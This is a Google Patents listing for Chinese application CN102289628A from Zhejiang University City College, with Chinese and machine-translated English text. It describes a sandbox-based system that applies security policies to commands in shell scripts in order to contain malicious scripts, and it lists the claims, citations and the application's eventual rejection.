[go: up one dir, main page]

CN102289628A - Sandbox-technology-based shell script security operating method and system - Google Patents

Sandbox-technology-based shell script security operating method and system Download PDF

Info

Publication number
CN102289628A
CN102289628A CN2011102049964A CN201110204996A CN102289628A CN 102289628 A CN102289628 A CN 102289628A CN 2011102049964 A CN2011102049964 A CN 2011102049964A CN 201110204996 A CN201110204996 A CN 201110204996A CN 102289628 A CN102289628 A CN 102289628A
Authority
CN
China
Prior art keywords
order
security
shell
security strategy
sandbox
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN2011102049964A
Other languages
Chinese (zh)
Inventor
孙霖
吴明晖
陈天洲
王云武
霍梅梅
彭彬
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Hangzhou City University
Original Assignee
Zhejiang University City College ZUCC
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Zhejiang University City College ZUCC filed Critical Zhejiang University City College ZUCC
Priority to CN2011102049964A priority Critical patent/CN102289628A/en
Publication of CN102289628A publication Critical patent/CN102289628A/en
Pending legal-status Critical Current

Links

Images

Landscapes

  • Storage Device Security (AREA)

Abstract

本发明公开了基于沙箱技术的shell脚本安全运行方法及系统。该沙箱技术的shell脚本安全运行系统,包括可控环境,安全管理器,安全策略和资源;可控环境,用于从shell脚本中识别可控命令、不可控命令或自定义许可;动态地创建沙箱并实施所述可控命令、不可控命令或自定义许可的安全策略;安全管理器,用于提取所述可控命令、不可控命令或自定义许可的安全策略;安全策略,用于定义允许执行的命令,以及命令可以访问的资源。本发明通过可控环境运行shell脚本,能有效阻止shell脚本中恶意命令对系统的危害。安全管理器为shell命令的运行提供多种安全策略,限制了命令在沙箱中对资源的访问权限,大大增强了脚本执行的安全性。

The invention discloses a sandbox technology-based safe operation method and system for shell scripts. The shell script security operating system of the sandbox technology includes a controllable environment, a security manager, security policies and resources; the controllable environment is used to identify controllable commands, uncontrollable commands or custom permissions from shell scripts; dynamically Create a sandbox and implement the security policy of the controllable command, uncontrollable command or custom permission; the security manager is used to extract the security policy of the controllable command, uncontrollable command or custom permission; the security policy is used Used to define the commands that are allowed to execute, and the resources that the commands can access. The invention runs the shell script in a controllable environment, and can effectively prevent malicious commands in the shell script from harming the system. The security manager provides a variety of security policies for the operation of shell commands, which limits the access rights of commands to resources in the sandbox, greatly enhancing the security of script execution.

Description

基于沙箱技术的shell脚本安全运行方法及系统Method and system for safe operation of shell script based on sandbox technology

技术领域 technical field

本发明涉及信息系统安全领域,尤其涉及基于沙箱技术的shell脚本安全运行方法及系统。  The invention relates to the field of information system security, in particular to a method and system for safely running shell scripts based on sandbox technology. the

背景技术 Background technique

shell脚本是指在计算机中执行若干命令的一种方法。shell脚本可以是文本的,也可以是图形化的。shell工具中包括shell命令,比如目录列表(ls),文件移动(mv)和删除(rm)等。一个shell脚本保存在一个文件中,并含有一组shell命令。shell命令可以访问计算机内的重要资源。目前,shell使用的安全性是通过操作系统来提供,主要是基于用户身份的方法,例如,用户A可以读写B文件,但是用户C却不可以。  Shell scripting refers to a method of executing several commands in a computer. Shell scripts can be textual or graphical. Shell tools include shell commands such as directory listing (ls), file movement (mv) and deletion (rm). A shell script is stored in a file and contains a set of shell commands. Shell commands can access important resources within your computer. At present, the security used by the shell is provided by the operating system, mainly based on user identity. For example, user A can read and write B files, but user C cannot. the

通过Internet及其他方式来下载程序和脚本愈加增多,迫切需要一种对下载的潜在恶意代码限制其访问计算机资源的方法。上述基于用户身份的操作系统安全策略尚不能为未知的、可能的恶意脚本提供安全保障。用户可能会无意识地运行恶意脚本,脚本一旦在用户授权的上下文环境中执行,那么脚本中的命令具有该用户相关的所有访问权限,可以破坏用户所拥有权限的相关资源,例如,用户A执行了脚本X,脚本X对文件B进行了恶意破坏。  There are more and more programs and scripts downloaded through the Internet and other means, and there is an urgent need for a method of restricting the downloaded potentially malicious codes from accessing computer resources. The above-mentioned operating system security policy based on user identity cannot provide security protection for unknown and possible malicious scripts. Users may run malicious scripts unconsciously. Once the script is executed in the context authorized by the user, the commands in the script have all the access rights related to the user, which can destroy the related resources of the user's permissions. For example, user A executes Script X, script X maliciously destroys file B. the

发明内容 Contents of the invention

针对现有技术中存在的上述问题,本发明提供了基于沙箱技术的shell脚本安全运行方法及系统。  Aiming at the above-mentioned problems existing in the prior art, the present invention provides a method and system for safely running shell scripts based on sandbox technology. the

本发明提供了一种基于沙箱技术的shell脚本安全运行系统,包括可控环境,安全管理器,安全策略和资源;  The present invention provides a shell script security operating system based on sandbox technology, including a controllable environment, a security manager, security policies and resources;

可控环境,用于从shell脚本中识别可控命令、不可控命令或自定义许 可;动态地创建沙箱并实施所述可控命令、不可控命令或自定义许可的安全策略;  Controllable environment for identifying controllable commands, uncontrollable commands or custom permissions from shell scripts; dynamically creating sandboxes and implementing security policies for the controllable commands, uncontrollable commands or custom permissions;

安全管理器,用于提取所述可控命令、不可控命令或自定义许可的安全策略;  A security manager, used to extract the controllable command, uncontrollable command or security policy of custom permission;

安全策略,用于定义允许执行的命令,以及命令可以访问的资源。  Security policies are used to define the commands that are allowed to be executed and the resources that the commands can access. the

在一个示例中,安全策略包括shell命令的安全策略、应用程序的安全策略、资源访问的安全策略、所有者权限的安全策略以及用户权限的安全策略。  In one example, the security policy includes a security policy for shell commands, a security policy for applications, a security policy for resource access, a security policy for owner permissions, and a security policy for user permissions. the

在一个示例中,可控命令是通用的shell命令和特定应用命令;不可控命令是没有安全策略的命令;自定义许可通过调用特定程序,来实现权限设置  In one example, controllable commands are general shell commands and specific application commands; uncontrollable commands are commands without security policies; custom permissions implement permission settings by calling specific programs

在一个示例中,资源包括文件、目录和进程。  In one example, resources include files, directories, and processes. the

本发明提供了一种基于沙箱技术的shell脚本安全运行方法,包括:  The present invention provides a method for safe operation of shell scripts based on sandbox technology, comprising:

步骤1,可控环境从shell脚本中识别可控命令、不可控命令或自定义许可;  Step 1, the controllable environment identifies controllable commands, uncontrollable commands or custom permissions from shell scripts;

步骤2,安全管理器提取所述可控命令、不可控命令或自定义许可的安全策略;  Step 2, the security manager extracts the security policy of the controllable command, uncontrollable command or custom permission;

步骤3,可控环境动态地创建沙箱并实施所述可控命令、不可控命令或自定义许可的安全策略,沙箱执行shell脚本中的命令。  Step 3, the controllable environment dynamically creates a sandbox and implements the security policy of the controllable command, uncontrollable command or custom permission, and the sandbox executes the commands in the shell script. the

在一个示例中,可控命令是通用的shell命令和特定应用命令;不可控命令是没有安全策略的命令;自定义许可通过调用特定程序,来实现权限设置。  In an example, the controllable commands are general shell commands and specific application commands; the uncontrollable commands are commands without security policies; and the custom permission implements permission setting by calling a specific program. the

在一个示例中,沙箱的数量为1个或多个。  In one example, the number of sandboxes is 1 or more. the

在一个示例中,安全策略包括shell命令的安全策略、应用程序的安全策略、资源访问的安全策略、所有者权限的安全策略以及用户权限的安全策略。  In one example, the security policy includes a security policy for shell commands, a security policy for applications, a security policy for resource access, a security policy for owner permissions, and a security policy for user permissions. the

本发明通过可控环境运行shell脚本,能有效阻止shell脚本中恶意命 令对系统的危害。安全管理器为shell命令的运行提供多种安全策略,限制了命令在沙箱中对资源的访问权限,大大增强了脚本执行的安全性。  The invention runs the shell script in a controllable environment, and can effectively prevent malicious commands in the shell script from harming the system. The security manager provides a variety of security policies for the operation of shell commands, which limits the access rights of commands to resources in the sandbox and greatly enhances the security of script execution. the

附图说明 Description of drawings

下面结合附图来对本发明作进一步详细说明,其中:  The present invention will be described in further detail below in conjunction with accompanying drawing, wherein:

图1是本发明基于沙箱技术的shell脚本安全运行系统组成示意图;  Fig. 1 is a schematic diagram of the composition of the present invention's shell script security operation system based on sandbox technology;

图2是本发明基于沙箱技术的shell脚本安全运行方法流程图;  Fig. 2 is the flow chart of the safe operation method of shell script based on sandbox technology of the present invention;

图3是本发明中可控环境的技术框图。  Fig. 3 is a technical block diagram of the controllable environment in the present invention. the

具体实施方式 Detailed ways

图1显示了本发明的基于沙箱技术的shell脚本安全运行系统结构。该计算机系统包含操作系统,shell脚本、可控环境、安全策略、安全管理器和可访问的资源,其中可控环境、安全策略、安全管理器构成本发明基于沙箱技术的shell脚本安全运行系统。一般计算机都包含一个操作系统。shell脚本可以从网络、硬盘、光盘等途径下载得到的,这些脚本可以是安全的,也可以是不安全的,脚本可以前台运行、也可以后台运行,脚本的来源和代码将会影响安全管理器采取怎样的安全策略。  Fig. 1 shows the structure of the shell script safe running system based on the sandbox technology of the present invention. This computer system comprises operating system, shell script, controllable environment, security policy, security manager and accessible resource, wherein controllable environment, security policy, security manager constitute the present invention's shell script safe running system based on sandbox technology . A typical computer contains an operating system. Shell scripts can be downloaded from the network, hard disk, CD, etc. These scripts can be safe or unsafe. The scripts can run in the foreground or in the background. The source and code of the script will affect the security manager What kind of security policy to adopt. the

可控环境是指应用本发明安全策略的shell,在shell上可以运行shell脚本。可控环境能为shell脚本的运行配置(例如加载)安全策略,并创建沙箱来实施安全策略。  The controllable environment refers to the shell applying the security policy of the present invention, and shell scripts can be run on the shell. The controlled environment can configure (eg load) security policies for the execution of shell scripts and create sandboxes to enforce security policies. the

安全管理器是指shell命令相关的安全策略管理器,它可以在建立沙箱环境时,动态地检测各种安全参数。安全参数是存储在计算机中的一个或多个安全策略,它可以是创建操作系统已有的安全策略,如用户权限,或者是在建立沙箱环境时用户自定义的安全策略。  The security manager refers to a security policy manager related to shell commands, which can dynamically detect various security parameters when creating a sandbox environment. The security parameters are one or more security policies stored in the computer, which may be existing security policies for creating an operating system, such as user rights, or user-defined security policies when creating a sandbox environment. the

安全策略用来定义哪些命令是允许执行的,以及命令可以访问的资源。安全策略可以用于定于shell命令的安全策略、应用程序的安全策略、资源访问的安全策略、所有者权限的安全策略以及用户权限的安全策略等。  Security policies are used to define which commands are allowed to execute and the resources that commands can access. The security policy can be used for the security policy of the shell command, the security policy of the application program, the security policy of the resource access, the security policy of the owner authority and the security policy of the user authority, etc. the

资源包括文件,目录,进程和其他资源。在shell执行过程中,一个shell脚本可能需要访问资源来执行命令,安全管理器可以通过安全策略的识别和执行,为各资源的访问实施相应的安全保护。  Resources include files, directories, processes and other resources. During the execution of the shell, a shell script may need to access resources to execute commands, and the security manager can implement corresponding security protection for the access of various resources through the identification and execution of security policies. the

图2是本发明基于沙箱技术的shell安全管理方法流程图,表示本发明如何在可控环境中执行shell脚本,具体步骤如下:  Fig. 2 is the flow chart of the shell security management method based on the sandbox technology of the present invention, showing how the present invention executes the shell script in a controllable environment, and the specific steps are as follows:

步骤1:可控环境从shell脚本中识别可控命令、不可控命令及自定义许可。可控命令是指一些通用的shell命令(例如,ls、rm、cp、mv)和特定应用命令(例如,数据备份和恢复工具)。不可控命令是指没有安全策略的命令,该类型命令可能存在潜在的危害,它们只有在安全策略允许下运行。自定义许可是在授权访问资源前,由安全管理器从程序库中调用执行。该类型的自定义许可通过调用特定程序,来实现高级权限设置,例如,可以自定义基于时间的资源访问策略。  Step 1: The controllable environment identifies controllable commands, uncontrollable commands, and custom permissions from shell scripts. Controllable commands refer to some common shell commands (for example, ls, rm, cp, mv) and specific application commands (for example, data backup and recovery tools). Uncontrollable commands refer to commands without a security policy. This type of command may be potentially harmful, and they can only be run under the permission of the security policy. Custom permissions are invoked by the security manager from the library before granting access to resources. This type of custom permission implements advanced permission settings by calling specific programs, for example, you can customize time-based resource access policies. the

步骤2:安全管理器提取各可控命令、不可控命令及自定义许可的安全策略。安全管理器根据系统中配置的安全策略,为当前待执行shell脚本中的可控命令、不可控命令及自定义许可建立相应的安全策略。  Step 2: The security manager extracts security policies for each controllable command, uncontrollable command, and custom permission. According to the security policy configured in the system, the security manager establishes corresponding security policies for the controllable commands, uncontrollable commands and custom permissions in the shell script currently to be executed. the

步骤3:可控环境动态地创建沙箱并实施可控命令、不可控命令及自定义许可相应的安全策略。根据安全策略中用户身份、资源访问权限等参数,可以动态地创建一个或者多个沙箱,并在沙箱上实施安全策略,  Step 3: The controllable environment dynamically creates a sandbox and implements controllable commands, uncontrollable commands and corresponding security policies for custom permissions. According to parameters such as user identity and resource access rights in the security policy, one or more sandboxes can be dynamically created, and security policies can be implemented on the sandboxes.

步骤4:沙箱执行shell脚本中的命令。  Step 4: The sandbox executes the commands in the shell script. the

图3进一步来说明本发明中可控环境、shell命令和沙箱。在可控环境中可以运行shell脚本。与shell脚本运行相关的对象有shell命令(可控命令、不可控命令)、自定义许可、资源、安全策略。shell脚本中的命令可以在一个或者多个实施安全策略的沙箱中运行。安全策略实例与shell命令及其请求的资源相关,在沙箱中实施。自定义许可可以由用户在创建沙箱时自定义。本发明从shell运行的多个方面,通过多个安全策略的组合,通过沙箱技术为shell脚本创建安全地运行环境。  Fig. 3 further illustrates the controllable environment, shell command and sandbox in the present invention. Shell scripts can be run in a controlled environment. Objects related to the running of shell scripts include shell commands (controllable and uncontrollable commands), custom permissions, resources, and security policies. Commands in shell scripts can be run in one or more sandboxes that enforce security policies. Security policy instances are associated with shell commands and the resources they request, enforced in the sandbox. Custom permissions can be customized by users when creating sandboxes. The present invention creates a safe operating environment for shell scripts through the combination of multiple security policies from multiple aspects of shell operation and sandbox technology. the

所述仅为本发明的优选实施方式,但本发明保护范围并不局限于此。任何本领域的技术人员在本发明公开的技术范围内,均可对其进行适当的改变或变化,而这种改变或变化都应涵盖在本发明的保护范围之内。  What is described is only a preferred embodiment of the present invention, but the protection scope of the present invention is not limited thereto. Any person skilled in the art can make appropriate changes or changes within the technical scope disclosed in the present invention, and such changes or changes should be covered within the protection scope of the present invention. the

Claims (8)

1. the shell script safe operation system based on the sandbox technology is characterized in that, comprises controllable environment, security manager, security strategy and resource;
Controllable environment is used for from the identification of shell script controlled order, uncontrollable order or self-defined permission; Dynamically create sandbox and implement the security strategy of described controlled order, uncontrollable order or self-defined permission;
Security manager is used to extract the security strategy of described controlled order, uncontrollable order or self-defined permission;
Security strategy be used to define the order that allows execution, and order can accessed resources.
2. the shell script safe operation system based on the sandbox technology as claimed in claim 1, it is characterized in that security strategy comprises the security strategy of shell-command, the security strategy of application program, the security strategy of resource access, the security strategy of owner's authority and the security strategy of user right.
3. the shell script safe operation system based on the sandbox technology as claimed in claim 1 is characterized in that, controlled order is general shell-command and application-specific order; Uncontrollable order is the order that does not have security strategy; Self-defined permission realizes the authority setting by calling specific program.
4. the shell script safe operation system based on the sandbox technology as claimed in claim 1 is characterized in that resource comprises file, catalogue and process.
5. the shell script method for safe operation based on the sandbox technology is characterized in that, comprising:
Step 1, controllable environment are discerned controlled order, uncontrollable order or self-defined permission from the shell script;
Step 2, security manager are extracted the security strategy of described controlled order, uncontrollable order or self-defined permission;
Step 3, controllable environment are dynamically created sandbox and are implemented the security strategy of described controlled order, uncontrollable order or self-defined permission, and sandbox is carried out the order in the shell script.
6. the shell script method for safe operation based on the sandbox technology as claimed in claim 5 is characterized in that, controlled order is general shell-command and application-specific order; Uncontrollable order is the order that does not have security strategy; Self-defined permission realizes the authority setting by calling specific program.
7. as claim 5 or 6 described shell script method for safe operation, it is characterized in that the quantity of sandbox is one or more based on the sandbox technology.
8. as claim 5 or 6 described shell script method for safe operation based on the sandbox technology, it is characterized in that security strategy comprises the security strategy of shell-command, the security strategy of application program, the security strategy of resource access, the security strategy of owner's authority and the security strategy of user right.
CN2011102049964A 2011-07-21 2011-07-21 Sandbox-technology-based shell script security operating method and system Pending CN102289628A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN2011102049964A CN102289628A (en) 2011-07-21 2011-07-21 Sandbox-technology-based shell script security operating method and system

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN2011102049964A CN102289628A (en) 2011-07-21 2011-07-21 Sandbox-technology-based shell script security operating method and system

Publications (1)

Publication Number Publication Date
CN102289628A true CN102289628A (en) 2011-12-21

Family

ID=45336043

Family Applications (1)

Application Number Title Priority Date Filing Date
CN2011102049964A Pending CN102289628A (en) 2011-07-21 2011-07-21 Sandbox-technology-based shell script security operating method and system

Country Status (1)

Country Link
CN (1) CN102289628A (en)

Cited By (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103019938A (en) * 2012-12-26 2013-04-03 北京搜狐新媒体信息技术有限公司 Method and device for locally testing application program based on cloud platform
CN105940409A (en) * 2014-01-27 2016-09-14 微软技术许可有限责任公司 Web service sandbox system
CN109462576A (en) * 2018-10-16 2019-03-12 腾讯科技(深圳)有限公司 Authorization policy configuration method, device and computer readable storage medium
CN110781491A (en) * 2019-10-25 2020-02-11 苏州浪潮智能科技有限公司 A kind of control method and device for process access file
CN117874749A (en) * 2024-01-15 2024-04-12 北京盛邦赛云科技有限公司 Sandbox code extension isolation device and method

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN1961272A (en) * 2004-06-29 2007-05-09 英特尔公司 Method of improving computer security through sandboxing
CN101253487A (en) * 2005-09-01 2008-08-27 微软公司 Resource-based dynamic security authorization
WO2011084431A2 (en) * 2009-12-15 2011-07-14 Mcafee, Inc. Systems and methods for behavioral sandboxing

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN1961272A (en) * 2004-06-29 2007-05-09 英特尔公司 Method of improving computer security through sandboxing
CN101253487A (en) * 2005-09-01 2008-08-27 微软公司 Resource-based dynamic security authorization
WO2011084431A2 (en) * 2009-12-15 2011-07-14 Mcafee, Inc. Systems and methods for behavioral sandboxing

Cited By (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103019938A (en) * 2012-12-26 2013-04-03 北京搜狐新媒体信息技术有限公司 Method and device for locally testing application program based on cloud platform
CN103019938B (en) * 2012-12-26 2016-12-28 北京搜狐新媒体信息技术有限公司 A kind of method and device in the application of local test cloud platform
CN105940409A (en) * 2014-01-27 2016-09-14 微软技术许可有限责任公司 Web service sandbox system
CN105940409B (en) * 2014-01-27 2018-12-04 微软技术许可有限责任公司 Network services sandbox system
CN109462576A (en) * 2018-10-16 2019-03-12 腾讯科技(深圳)有限公司 Authorization policy configuration method, device and computer readable storage medium
CN110781491A (en) * 2019-10-25 2020-02-11 苏州浪潮智能科技有限公司 A kind of control method and device for process access file
CN117874749A (en) * 2024-01-15 2024-04-12 北京盛邦赛云科技有限公司 Sandbox code extension isolation device and method

Similar Documents

Publication Publication Date Title
US7725922B2 (en) System and method for using sandboxes in a managed shell
US9888032B2 (en) Method and system for mitigating the effects of ransomware
US10628560B1 (en) Permission request system and method
CN103403669B (en) App is made to become safe method and the method preventing app damage equipment
US7085928B1 (en) System and method for defending against malicious software
US20100122313A1 (en) Method and system for restricting file access in a computer system
US9659182B1 (en) Systems and methods for protecting data files
CN103246849A (en) Safe running method based on ROST under Windows
JP2003162452A (en) System and method for protecting data stored in storage medium device
CN102289628A (en) Sandbox-technology-based shell script security operating method and system
WO2022078366A1 (en) Application protection method and apparatus, device and medium
WO2016058291A1 (en) Method and system for packaging mobile application
JP2018124893A (en) Computer system and file access controlling method
WO2017016231A1 (en) Policy management method, system and computer storage medium
CN102663313B (en) Method for realizing information security of computer system
CN106326733A (en) Method and device for managing applications in mobile terminal
JP4526383B2 (en) Tamper evident removable media for storing executable code
CN101827091A (en) Method for detecting Solaris system fault by utilizing mandatory access control
GB2515736A (en) Controlling access to one or more datasets of an operating system in use
CN117453344A (en) A container trust enhancement mechanism based on Linux system calls
Seong et al. Security improvement of file system filter driver in windows embedded OS
Michalska et al. Security risks and their prevention capabilities in mobile application development
CN102999611B (en) Browser calls method and plugin manager, the browser of plug-in unit
KR101151284B1 (en) System for preventing network action of injection thread and method thereof
CN105550567A (en) A method for controlling the read and write permissions of a Windows virtual machine USB device

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
C12 Rejection of a patent application after its publication
RJ01 Rejection of invention patent application after publication

Application publication date: 20111221